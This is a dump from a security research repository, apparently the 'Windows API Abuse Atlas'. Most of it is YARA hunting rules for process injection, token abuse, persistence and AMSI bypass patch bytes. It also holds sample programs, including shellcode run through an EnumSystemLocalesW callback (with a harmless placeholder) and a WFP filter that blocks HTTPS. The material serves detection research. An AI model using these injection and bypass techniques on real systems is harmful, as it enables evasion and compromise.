4 | 5 | 6 | rule Win_API_Abuse_ShellExecute_Suspicious 7 | { 8 | meta: 9 | author = "Windows API Abuse Atlas" 10 | description = "Detects suspicious use of ShellExecute API that may indicate malicious activity" 11 | 12 | strings: 13 | $ShellExecute = "ShellExecute" ascii wide 14 | 15 | // Suspicious verbs or protocol handlers often abused 16 | $verb1 = "runas" nocase 17 | $verb2 = "powershell" nocase 18 | $verb3 = "cmd.exe" nocase 19 | $verb4 = "mshta" nocase 20 | $verb5 = "javascript:" nocase 21 | $verb6 = "vbscript:" nocase 22 | $verb7 = "ftp://" nocase 23 | $verb8 = "http://" nocase 24 | $verb9 = "https://" nocase 25 | $verb10 = ".lnk" nocase 26 | $verb11 = ".url" nocase 27 | 28 | condition: 29 | uint16(0) == 0x5A4D and // PE file 30 | filesize < 10MB and 31 | $ShellExecute and (any of ($verb*)) 32 | } 33 | -------------------------------------------------------------------------------- /FWPUCLNT/FwpmEngineOpen/FwpmEngineOpen.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule Suspicious_WFP_Manipulation 6 | { 7 | meta: 8 | description = "Detects binaries that import or reference Windows Filtering Platform (WFP) APIs often abused for network manipulation" 9 | reference = "Windows API Abuse Atlas" 10 | 11 | strings: 12 | // WFP API usage 13 | $fwpm1 = "FwpmEngineOpen" wide ascii 14 | $fwpm2 = "FwpmFilterAdd" wide ascii 15 | $fwpm3 = "FwpmFilterRemove" wide ascii 16 | $fwpm4 = "FwpmCalloutAdd" wide ascii 17 | $fwpm5 = "FwpmCalloutRemove" wide ascii 18 | 19 | // Indicators of custom C2/packet manipulation 20 | $c2_1 = "SetWindowsHookEx" wide ascii 21 | $c2_2 = "CreateThread" wide ascii 22 | $c2_3 = "recv" wide ascii 23 | $c2_4 = "send" wide ascii 24 | $net1 = "connect" wide ascii 25 | 26 | condition: 27 | (uint16(0) == 0x5A4D) and // PE file 28 | (2 of ($fwpm*)) and (2 of ($c2_*) or $net1) 29 | } 30 | -------------------------------------------------------------------------------- /SETUPAPI/SetupInstallFile/sample.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #pragma comment(lib, "setupapi.lib") 6 | 7 | int main(void) { 8 | HINF hInf = SetupOpenInfFileA("C:\\Temp\\test.inf", NULL, INF_STYLE_WIN4, NULL); 9 | if (hInf == INVALID_HANDLE_VALUE) { 10 | printf("Failed to open INF file. Error: %lu\n", GetLastError()); 11 | return 1; 12 | } 13 | 14 | INFCONTEXT context; 15 | if (!SetupFindFirstLineA(hInf, "DestinationDirs", "MyDriverFiles", &context)) { 16 | printf("Failed to find INF context. Error: %lu\n", GetLastError()); 17 | SetupCloseInfFile(hInf); 18 | return 1; 19 | } 20 | 21 | BOOL result = SetupInstallFileA( 22 | hInf, 23 | &context, 24 | "C:\\Temp\\test_driver_note.txt", // Source file 25 | NULL, // Source path root 26 | "test_driver_note.txt", // Destination name 27 | SP_COPY_NOOVERWRITE, 28 | NULL, 29 | NULL 30 | ); 31 | 32 | if (result) { 33 | printf("File installed successfully.\n"); 34 | } else { 35 | printf("SetupInstallFile failed. Error: %lu\n", GetLastError()); 36 | } 37 | 38 | SetupCloseInfFile(hInf); 39 | return 0; 40 | } 41 | -------------------------------------------------------------------------------- /FWPUCLNT/FwpmEngineOpen/sample1.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #pragma comment(lib, "fwpuclnt.lib") 6 | 7 | int main() { 8 | HANDLE engineHandle = NULL; 9 | DWORD result; 10 | 11 | // Open WFP engine 12 | result = FwpmEngineOpen0(NULL, RPC_C_AUTHN_WINNT, NULL, NULL, &engineHandle); 13 | 14 | // Define and add a sublayer (optional, for organization) 15 | FWPM_SUBLAYER0 sublayer = {0}; 16 | sublayer.subLayerKey = {0xdeadbeef, 0x1234, 0x5678, {0xab, 0xcd, 0xef, 0x00, 0x01, 0x02, 0x03, 0x04}}; 17 | sublayer.displayData.name = L"Malicious SubLayer"; 18 | sublayer.displayData.description = L"Blocks HTTPS traffic"; 19 | sublayer.flags = 0; 20 | sublayer.weight = 0x100; 21 | 22 | 23 | if (result != ERROR_SUCCESS) { 24 | printf("FwpmEngineOpen0 failed: %lu\n", result); 25 | return 1; 26 | } 27 | 28 | result = FwpmSubLayerAdd0(engineHandle, &sublayer, NULL); 29 | if (result != ERROR_SUCCESS) { 30 | printf("FwpmSubLayerAdd0 failed: %lu\n", result); 31 | FwpmEngineClose0(engineHandle); 32 | return 1; 33 | } 34 | 35 | // Build a filter condition: destination port == 443 36 | FWPM_FILTER_CONDITION0 condition = {0}; 37 | condition.fieldKey = FWPM_CONDIT_ 38 | -------------------------------------------------------------------------------- /KERNEL32/SetThreadContext/SetThreadcontext.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule Suspicious_SetThreadContext_Abuse 6 | { 7 | meta: 8 | description = "Detects potential abuse of SetThreadContext with related APIs" 9 | reference = "https://github.com/danafaye/WindowsAPIAbuseAtlas" 10 | 11 | strings: 12 | $setThreadContext = "SetThreadContext" ascii nocase 13 | $getThreadContext = "GetThreadContext" ascii nocase 14 | $suspendThread = "SuspendThread" ascii nocase 15 | $resumeThread = "ResumeThread" ascii nocase 16 | $writeProcessMemory = "WriteProcessMemory" ascii nocase 17 | $virtualAllocEx = "VirtualAllocEx" ascii nocase 18 | 19 | condition: 20 | uint16(0) == 0x5A4D and // PE file 21 | filesize < 5MB and 22 | $setThreadContext and 23 | ( 24 | $getThreadContext or 25 | $suspendThread or 26 | $resumeThread or 27 | $writeProcessMemory or 28 | $virtualAllocEx 29 | ) 30 | } 31 | -------------------------------------------------------------------------------- /USER32/OpenDesktop/OpenDesktop.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule Suspicious_OpenDesktop_Abuse 6 | { 7 | meta: 8 | description = "Detects potential abuse of OpenDesktop API, especially with Winlogon spoofing" 9 | reference = "Windows API Abuse Atlas - OpenDesktop" 10 | 11 | strings: 12 | $opendesktop = "OpenDesktopA" ascii wide 13 | $opendesktopW = "OpenDesktopW" ascii wide 14 | $switchdesktop = "SwitchDesktop" ascii wide 15 | $setthreaddesktop = "SetThreadDesktop" ascii wide 16 | $creatdesktop = "CreateDesktopA" ascii wide 17 | $winlogon_str = "Winlogon" ascii wide 18 | $disconnect_str = "Disconnect" ascii wide 19 | $securedesktop_str = "Secure" ascii wide 20 | 21 | condition: 22 | uint16(0) == 0x5A4D and // Check for MZ header 23 | filesize < 10MB and 24 | 2 of ($opendesktop, $opendesktopW, $switchdesktop, $setthreaddesktop, $creatdesktop) and 25 | 1 of ($winlogon_str, $disconnect_str, $securedesktop_str) 26 | } 27 | -------------------------------------------------------------------------------- /NTDLL/NtReadVirtualMemory/NtReadVirtualMemory.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | import "pe" 5 | 6 | rule Suspicious_NtReadVirtualMemory_Import 7 | { 8 | meta: 9 | description = "Binary imports ntdll!NtReadVirtualMemory (often paired with injection/dumping)" 10 | author = "Windows API Abuse Atlas" 11 | strings: 12 | $NtReadVirtualMemory = "NtReadVirtualMemory" ascii wide 13 | $GetProcAddress = "GetProcAddress" ascii wide 14 | $LoadLibrary = "LoadLibrary" ascii wide 15 | condition: 16 | uint16(0) == 0x5A4D and 17 | filesize < 10MB and 18 | all of them 19 | } 20 | 21 | rule Direct_Syscall_Stub_ReadVirtualMemory_Like 22 | { 23 | meta: 24 | description = "Heuristic syscall stub often used to invoke NT APIs directly" 25 | author = "Windows API Abuse Atlas" 26 | note = "General syscall stub; not specific to NtReadVirtualMemory. High FP risk." 27 | strings: 28 | $prolog = { 49 89 CA B8 ?? ?? 00 00 0F 05 C3 } 29 | condition: 30 | uint16(0) == 0x5A4D and 31 | filesize < 10MB and 32 | $prolog 33 | } -------------------------------------------------------------------------------- /NTDLL/NtTraceEvent/NtTraceEvent.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | 6 | rule Possible_EtwTraceEvent_Abuse 7 | { 8 | meta: 9 | description = "Detects suspicious usage or resolution of EtwTraceEvent, often abused for ETW spoofing or evasion" 10 | author = "Windows API Abuse Atlas" 11 | reference = "https://github.com/danafaye/WindowsAPIAbuseAtlas" 12 | 13 | strings: 14 | $api_name = "EtwTraceEvent" wide ascii 15 | $api_name_nt = "NtTraceEvent" wide ascii 16 | $ntdll = "ntdll.dll" wide ascii 17 | $getproc = "GetProcAddress" wide ascii 18 | $loadlib = "LoadLibraryA" wide ascii 19 | $traceevent_sig = { 4C 8B DC 48 81 EC ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 8B DA } // common EtwTraceEvent prologue in ntdll (x64) 20 | 21 | condition: 22 | // Catch binaries that import or resolve NtTraceEvent or EtwTraceEvent manually 23 | (uint16(0) == 0x5A4D and 24 | (1 of ($api_name, $api_name_nt, $traceevent_sig) and 25 | 1 of ($getproc, $loadlib, $ntdll))) 26 | } 27 | -------------------------------------------------------------------------------- /NTDLL/NtWriteVirtualMemory/NtWriteVirtualMemory.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule Static_ProcessInjection_Pattern 6 | { 7 | meta: 8 | description = "Detects classic process injection chains using NtWriteVirtualMemory" 9 | author = "Dana Behling" 10 | version = "2.0" 11 | date = "2025-06-15" 12 | reference = "Windows API Abuse Atlas" 13 | 14 | strings: 15 | $open = "OpenProcess" ascii wide 16 | $alloc = "VirtualAllocEx" ascii wide 17 | $write1 = "NtWriteVirtualMemory" ascii wide 18 | $write2 = "WriteProcessMemory" ascii wide 19 | $thread1 = "CreateRemoteThread" ascii wide 20 | $thread2 = "NtCreateThreadEx" ascii wide 21 | $notepad = "notepad.exe" ascii wide 22 | $explorer = "explorer.exe" ascii wide 23 | 24 | condition: 25 | uint16(0) == 0x5A4D and // PE file 26 | filesize < 10MB and 27 | 2 of ($write*) and 28 | 1 of ($thread*) and 29 | all of ($open, $alloc) and 30 | ($notepad or $explorer) 31 | } 32 | -------------------------------------------------------------------------------- /OLE32/CoCreateInstance/CoCreateInstance.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule CommonlyAbused_COM_CLSIDs_Binary 6 | { 7 | meta: 8 | description = "Detects binary representations of commonly abused COM CLSIDs" 9 | reference = "Windows API Abuse Atlas" 10 | 11 | strings: 12 | $clsid_ShellWindows = { 72 59 A0 9B A8 F6 CF 11 A4 42 00 A0 C9 0A 8F 39 } 13 | $clsid_ShellApplication = { 20 96 70 13 79 C2 CE 11 A4 9E 44 45 53 54 00 00 } 14 | $clsid_WScriptShell = { D5 4D C2 72 0A D7 8B 43 8A 42 98 42 4B 88 AF B8 } 15 | $clsid_FileSystemObject = { 32 8F 07 F5 51 C5 D3 11 89 B9 00 00 F8 1F E2 21 } 16 | $clsid_Msxml2DOMDocument6 = { C0 69 D9 88 92 F1 D4 11 A6 5F 00 40 96 32 51 E5 } 17 | $clsid_IEWebBrowser = { 68 5B 17 9E 2A F5 D8 11 B9 A5 50 50 54 50 30 30 } 18 | $clsid_InternetExplorerApp = { 01 DF 02 00 00 00 00 00 C0 00 00 00 00 00 00 46 } 19 | 20 | condition: 21 | uint16(0) == 0x5A4D and // PE file 22 | filesize < 10MB and 23 | any of ($clsid*) 24 | } 25 | -------------------------------------------------------------------------------- /NTDLL/NtOpenProcessToken/NtOpenProcessToken.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule NtOpenProcessToken_Suspicious 6 | { 7 | meta: 8 | author = "Windows API Abuse Atlas" 9 | description = "Detects references to NtOpenProcessToken + sibling APIs (DuplicateTokenEx, OpenProcess, CreateProcessWithTokenW, etc.) — hunting rule, not high-fidelity prevention." 10 | 11 | strings: 12 | $NtOpenProcessToken = "NtOpenProcessToken" ascii wide 13 | $api_DuplicateToken = "DuplicateToken" ascii wide 14 | $api_OpenProcess = "OpenProcess" ascii wide 15 | $api_NtDuplicateObject = "NtDuplicateObject" ascii wide 16 | $api_CreateProcessWithTokenW = "CreateProcessWithTokenW" ascii wide 17 | $api_SetThreadToken = "SetThreadToken" ascii wide 18 | $api_ImpersonateLoggedOnUser = "ImpersonateLoggedOnUser" ascii wide 19 | $api_SeDebugPrivilege = "SeDebugPrivilege" ascii wide 20 | 21 | condition: 22 | uint16(0) == 0x5A4D and 23 | filesize < 10MB and 24 | $NtOpenProcessToken and 25 | 2 of ($api_*) 26 | } -------------------------------------------------------------------------------- /KERNEL32/EnumProcesses/EnumProcesses.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | import "pe" 5 | 6 | rule Suspicious_EnumProcesses_Usage 7 | { 8 | meta: 9 | description = "Detects binaries abusing EnumProcesses in combination with typical post-enumeration APIs" 10 | reference = "Windows API Abuse Atlas" 11 | 12 | strings: 13 | $EnumProcesses = "EnumProcesses" ascii wide 14 | $K32EnumProcesses = "K32EnumProcesses" ascii wide 15 | $a1 = "OpenProcess" ascii wide 16 | $a2 = "EnumProcessModules" ascii wide 17 | $a3 = "GetModuleBaseName" ascii wide 18 | $a4 = "QueryFullProcessImageNameW" ascii wide 19 | $a5 = "CreateToolhelp32Snapshot" ascii wide 20 | $a6 = "Process32FirstW" ascii wide 21 | $a7 = "Process32NextW" ascii wide 22 | 23 | condition: 24 | uint16(0) == 0x5A4D and // PE header 25 | ($EnumProcesses or $K32EnumProcesses) and 26 | 3 of ($a*) and 27 | filesize < 2MB and 28 | not for any i in (0..pe.number_of_signatures): 29 | (pe.signatures[i].issuer contains "Microsoft") 30 | } 31 | -------------------------------------------------------------------------------- /NTDLL/NtQueryInformationProcess/NtQueryInformationProcess.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule Potential_NtQueryInformationProcess_Abuse 6 | { 7 | meta: 8 | description = "Detects potential abuse of NtQueryInformationProcess via native syscall" 9 | reference = "Windows API Abuse Atlas" 10 | 11 | strings: 12 | $api_name1 = "NtQueryInformationProcess" ascii 13 | $api_name2 = "ZwQueryInformationProcess" ascii 14 | $info_class_dbgport = { 6A 07 6A 00 68 ?? ?? ?? ?? } // push 0x7 (ProcessDebugPort) 15 | $info_class_dbgobj = { 6A 1E 6A 00 68 ?? ?? ?? ?? } // push 0x1e (ProcessDebugObjectHandle) 16 | $info_class_dbgflag = { 6A 1F 6A 00 68 ?? ?? ?? ?? } // push 0x1f (ProcessDebugFlags) 17 | $info_class_basic = { 6A 00 6A 00 68 ?? ?? ?? ?? } // push 0x0 (ProcessBasicInformation) 18 | $syscall_stub = { 4C 8B D1 B8 39 00 00 00 0F 05 C3 } // common NtQueryInformationProcess syscall pattern (x64) 19 | 20 | condition: 21 | 1 of ($api_name*) and 22 | (1 of ($info_class_dbg*) or $info_class_basic or $syscall_stub) 23 | } 24 | -------------------------------------------------------------------------------- /ADVAPI32/OpenProcessToken/OpenProcessToken.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule Suspicious_OpenProcessToken_Usage 6 | { 7 | meta: 8 | description = "Detects suspicious use of OpenProcessToken (privilege escalation / impersonation)" 9 | reference = "Windows API Abuse Atlas - OpenProcessToken" 10 | 11 | strings: 12 | // Core API 13 | $openprocesstoken = "OpenProcessToken" ascii wide 14 | 15 | // Common malicious companions 16 | $api_adjusttokenprivileges = "AdjustTokenPrivileges" ascii wide 17 | $api_duplicatetoken = "DuplicateToken" ascii wide 18 | $api_duplicatetokenex = "DuplicateTokenEx" ascii wide 19 | $api_impersonateloggedonuser = "ImpersonateLoggedOnUser" ascii wide 20 | $api_setthreadtoken = "SetThreadToken" ascii wide 21 | 22 | condition: 23 | uint16(0) == 0x5A4D and // PE file 24 | filesize < 10MB and // Reasonable size limit to avoid false positives 25 | // Look for OpenProcessToken plus at least one common abuse function 26 | $openprocesstoken and 27 | 1 of ($api*) 28 | } 29 | -------------------------------------------------------------------------------- /NTDLL/NtUnmapViewOfSection/NtUnmapViewOfSection.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | 6 | rule Suspicious_NtUnmapViewOfSection_Usage 7 | { 8 | meta: 9 | author = "Windows API Abuse Atlas" 10 | description = "Flags binaries referencing NtUnmapViewOfSection with characteristics suggesting process hollowing or injection" 11 | reference = "https://github.com/danafaye/WindowsAPIAbuseAtlas" 12 | 13 | strings: 14 | $api = "NtUnmapViewOfSection" ascii 15 | $create_section = "NtCreateSection" ascii 16 | $map_section = "NtMapViewOfSection" ascii 17 | $write_mem = "NtWriteVirtualMemory" ascii 18 | $resume_thread = "NtResumeThread" ascii 19 | $create_process = "CreateProcessW" ascii 20 | 21 | condition: 22 | uint16(0) == 0x5A4D and // Check for MZ header 23 | filesize < 5MB and // Filter out large installers 24 | $api and // Must reference NtUnmapViewOfSection 25 | (1 of ($create_section, $map_section, $write_mem, $resume_thread, $create_process)) 26 | } 27 | -------------------------------------------------------------------------------- /ADVAPI32/CryptEnumProviders/sample.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #pragma comment(lib, "advapi32.lib") 6 | 7 | int main() { 8 | DWORD index = 0; 9 | DWORD provType = 0; 10 | CHAR provName[256]; 11 | DWORD provNameLen = sizeof(provName); 12 | HCRYPTPROV hProv = 0; 13 | 14 | printf("Enumerating Cryptographic Providers:\n\n"); 15 | 16 | while (CryptEnumProvidersA(index, NULL, 0, &provType, provName, &provNameLen)) { 17 | printf("Provider %d: %s (Type %lu)\n", index, provName, provType); 18 | 19 | // Attempt to acquire a context 20 | if (CryptAcquireContextA(&hProv, NULL, provName, provType, CRYPT_VERIFYCONTEXT)) { 21 | printf(" [*] Acquired context for %s\n", provName); 22 | 23 | // Normally here you'd call CryptGetUserKey or CryptExportKey to exfil keys 24 | CryptReleaseContext(hProv, 0); 25 | } else { 26 | printf(" [!] Failed to acquire context (Error: %lu)\n", GetLastError()); 27 | } 28 | 29 | index++; 30 | provNameLen = sizeof(provName); // reset buffer size 31 | } 32 | 33 | if (GetLastError() == ERROR_NO_MORE_ITEMS) { 34 | printf("\nEnumeration complete.\n"); 35 | } else { 36 | printf("\nEnumeration failed. Error: %lu\n", GetLastError()); 37 | } 38 | 39 | return 0; 40 | } 41 | -------------------------------------------------------------------------------- /KERNEL32/EnumSystemLocalesW/sample.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 10 | procEnumSystemLocalesW = kernel32.NewProc("EnumSystemLocalesW") 11 | virtualAlloc = kernel32.NewProc("VirtualAlloc") 12 | ) 13 | 14 | const ( 15 | MEM_COMMIT = 0x1000 16 | MEM_RESERVE = 0x2000 17 | PAGE_EXECUTE_READWRITE = 0x40 18 | ) 19 | 20 | func main() { 21 | // Example: Windows MessageBox shellcode (harmless, for demo) 22 | // 64-bit shellcode must match platform 23 | shellcode := []byte{ 24 | 0x90, 0x90, // NOPs (replace with real shellcode) 25 | 0xC3, // RET — just to safely return in this example 26 | } 27 | 28 | addr, _, err := virtualAlloc.Call( 29 | 0, 30 | uintptr(len(shellcode)), 31 | MEM_COMMIT|MEM_RESERVE, 32 | PAGE_EXECUTE_READWRITE, 33 | ) 34 | if addr == 0 { 35 | panic(err) 36 | } 37 | 38 | // Copy shellcode to allocated memory 39 | shellcodePtr := unsafe.Pointer(addr) 40 | for i := 0; i < len(shellcode); i++ { 41 | *(*byte)(unsafe.Pointer(uintptr(shellcodePtr) + uintptr(i))) = shellcode[i] 42 | } 43 | 44 | // Call EnumSystemLocalesW with shellcode as callback 45 | ret, _, callErr := procEnumSystemLocalesW.Call( 46 | addr, // trampoline callback to shellcode 47 | 0, 48 | ) 49 | if ret == 0 { 50 | panic(callErr) 51 | } 52 | } 53 | -------------------------------------------------------------------------------- /ADVAPI32/ControlService/ControlService.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule Suspicious_ControlService_Abuse 6 | { 7 | meta: 8 | author = "Windows API Abuse Atlas" 9 | description = "Detects binaries abusing ControlService with other service manipulation APIs" 10 | 11 | strings: 12 | $a1 = "OpenSCManagerA" wide ascii 13 | $a2 = "OpenSCManagerW" wide ascii 14 | $b1 = "OpenServiceA" wide ascii 15 | $b2 = "OpenServiceW" wide ascii 16 | $c1 = "ControlService" wide ascii 17 | $d1 = "ChangeServiceConfigA" wide ascii 18 | $d2 = "ChangeServiceConfigW" wide ascii 19 | $e1 = "ChangeServiceConfig2A" wide ascii 20 | $e2 = "ChangeServiceConfig2W" wide ascii 21 | $f1 = "CreateServiceA" wide ascii 22 | $f2 = "CreateServiceW" wide ascii 23 | $g1 = "DeleteService" wide ascii 24 | $h1 = "StartServiceA" wide ascii 25 | $h2 = "StartServiceW" wide ascii 26 | 27 | condition: 28 | (uint16(0) == 0x5A4D) and // PE file 29 | $c1 and 30 | 3 of ($a*,$b*,$d*,$e*,$f*,$g*,$h*) // Must include ControlService + at least 3 others 31 | } 32 | -------------------------------------------------------------------------------- /KERNEL32/CreateFileMapping/CreateFileMapping.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule Suspicious_CreateFileMapping_Usage 6 | { 7 | meta: 8 | description = "Detects suspicious use of CreateFileMapping and related APIs for potential in-memory code injection or fileless payload staging" 9 | author = "ChatGPT for Windows API Abuse Atlas" 10 | 11 | strings: 12 | $createfilemapping = "CreateFileMapping" ascii nocase 13 | $api_mapviewoffile = "MapViewOfFile" ascii nocase 14 | $api_createprocess = "CreateProcess" ascii nocase 15 | $api_createremotethread = "CreateRemoteThread" ascii nocase 16 | 17 | // Suspicious section or shared memory names often seen in malware 18 | $susp_section_name1 = "{GUID-" ascii nocase 19 | $susp_section_name2 = "Global\\" ascii nocase 20 | $susp_section_name3 = "Local\\" ascii nocase 21 | $susp_section_name4 = "MsMpSvc" ascii nocase // mimicking legitimate service names used as masquerade 22 | 23 | condition: 24 | (uint16(0) == 0x5A4D) and // PE file 25 | $createfilemapping and 26 | (1 of ($api*)) and 27 | (1 of ($susp*)) 28 | } -------------------------------------------------------------------------------- /NTDLL/NtCreateFile/NtCreateFile.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule NTCREATEFILE_DYNAMIC_RESOLUTION 6 | { 7 | meta: 8 | author = "Windows API Abuse Atlas" 9 | description = "Flag binaries that contain native NtCreateFile/ZwCreateFile symbols together with dynamic-resolution/import helpers (GetProcAddress/LoadLibrary) or other low-level APIs commonly paired with malicious file staging." 10 | 11 | strings: 12 | // native symbol names (ASCII) 13 | $NtCreateFile = "NtCreateFile" 14 | $api_01 = "ZwCreateFile" 15 | $api_02 = "NtOpenFile" 16 | $api_03 = "NtWriteFile" 17 | $api_04 = "NtReadFile" 18 | $api_05 = "NtCreateSection" 19 | $api_06 = "NtMapViewOfSection" 20 | $api_07 = "DeviceIoControl" 21 | $api_08 = "NtResumeProcess" 22 | $api_09 = "NtSuspendProcess" 23 | 24 | // kernel32 / resolver helpers (ASCII) 25 | $api_10 = "GetProcAddress" 26 | $api_11 = "LoadLibrary" 27 | 28 | condition: 29 | uint16(0) == 0x5A4D and 30 | filesize < 10MB and 31 | $NtCreateFile and 32 | (2 of ($api_*)) 33 | } 34 | -------------------------------------------------------------------------------- /NTDLL/NtCreateKey/NtCreateKey.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | 6 | rule NtCreateKey_malicious_use 7 | { 8 | meta: 9 | description = "Detects malicious use of NtCreateKey via import or string references" 10 | reference = "windows-api-abuse-atlas" 11 | 12 | strings: 13 | $NtCreateKey = "NtCreateKey" ascii wide 14 | $GetProcAddress = "GetProcAddress" ascii wide 15 | $LoadLibrary = "LoadLibrary" ascii wide 16 | $ntdll = "ntdll.dll" ascii wide 17 | 18 | // Common registry paths for persistence 19 | $r1 = "Software\\Microsoft\\Windows\\CurrentVersion\\Run" ascii wide 20 | $r2 = "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce" ascii wide 21 | $r3 = "Software\\Microsoft\\Windows\\CurrentVersion\\RunServices" ascii wide 22 | $r4 = "Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce" ascii wide 23 | 24 | condition: 25 | uint16(0) == 0x5A4D and 26 | filesize < 10MB and 27 | ( 28 | $NtCreateKey and 29 | $GetProcAddress and 30 | $LoadLibrary and 31 | $ntdll 32 | ) and 33 | (1 of ($r*)) 34 | } 35 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # If you prefer the allow list template instead of the deny list, see community template: 2 | # https://github.com/github/gitignore/blob/main/community/Golang/Go.AllowList.gitignore 3 | # 4 | # Binaries for programs and plugins 5 | *.exe 6 | *.exe~ 7 | *.dll 8 | *.so 9 | *.dylib 10 | 11 | # Test binary, built with `go test -c` 12 | *.test 13 | 14 | # Code coverage profiles and other test artifacts 15 | *.out 16 | coverage.* 17 | *.coverprofile 18 | profile.cov 19 | 20 | # Dependency directories (remove the comment below to include it) 21 | # vendor/ 22 | 23 | # Go workspace file 24 | go.work 25 | go.work.sum 26 | 27 | # env file 28 | .env 29 | 30 | # Editor/IDE 31 | .idea/ 32 | .vscode/ 33 | 34 | # Byte-compiled / optimized / DLL files 35 | __pycache__/ 36 | *.py[cod] 37 | *$py.class 38 | 39 | # VS Code settings 40 | .vscode/ 41 | 42 | # OS generated files 43 | .DS_Store 44 | Thumbs.db 45 | 46 | # Logs and databases 47 | *.log 48 | *.sqlite 49 | *.db 50 | 51 | # Compiled binaries and object files 52 | *.exe 53 | *.dll 54 | *.so 55 | *.o 56 | *.obj 57 | *.out 58 | 59 | # Archives 60 | *.zip 61 | *.tar 62 | *.tar.gz 63 | *.rar 64 | *.7z 65 | 66 | # Temporary files 67 | *.tmp 68 | *.swp 69 | *.bak 70 | *~ 71 | 72 | # Jupyter Notebook checkpoints 73 | .ipynb_checkpoints/ 74 | 75 | # Python virtual environments 76 | env/ 77 | venv/ 78 | ENV/ 79 | .venv/ 80 | 81 | # Ignore large malware samples directory (customize as needed) 82 | malware/ 83 | samples/ 84 | -------------------------------------------------------------------------------- /AMSI/AmsiScanString/AmsiScanString.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule AMSI_AmsiScanString_Patch 6 | { 7 | meta: 8 | description = "Detects common AMSI bypass patches on AmsiScanString (e.g., mov eax, 0; ret)" 9 | author = "Windows API Abuse Atlas" 10 | reference = "https://github.com/danafaye/WindowsAPIAbuseAtlas" 11 | date = "2025-08-19" 12 | threat = "AmsiScanString manipulation / AMSI bypass" 13 | 14 | strings: 15 | // Classic AMSI bypass patch: mov eax,0; ret (x64: B8 00 00 00 00 C3) 16 | $patch1 = { B8 00 00 00 00 C3 } 17 | 18 | // Short jump over AMSI call (jmp +6) often used in shellcode patches 19 | $patch2 = { EB 06 90 90 90 90 } 20 | 21 | // Common PowerShell inline AMSI patch (hex-encoded) 22 | $patch_ps = "B800000000C3" nocase ascii wide 23 | 24 | // String references to AmsiScanString (suspicious if paired with patching code) 25 | $amsiStr = 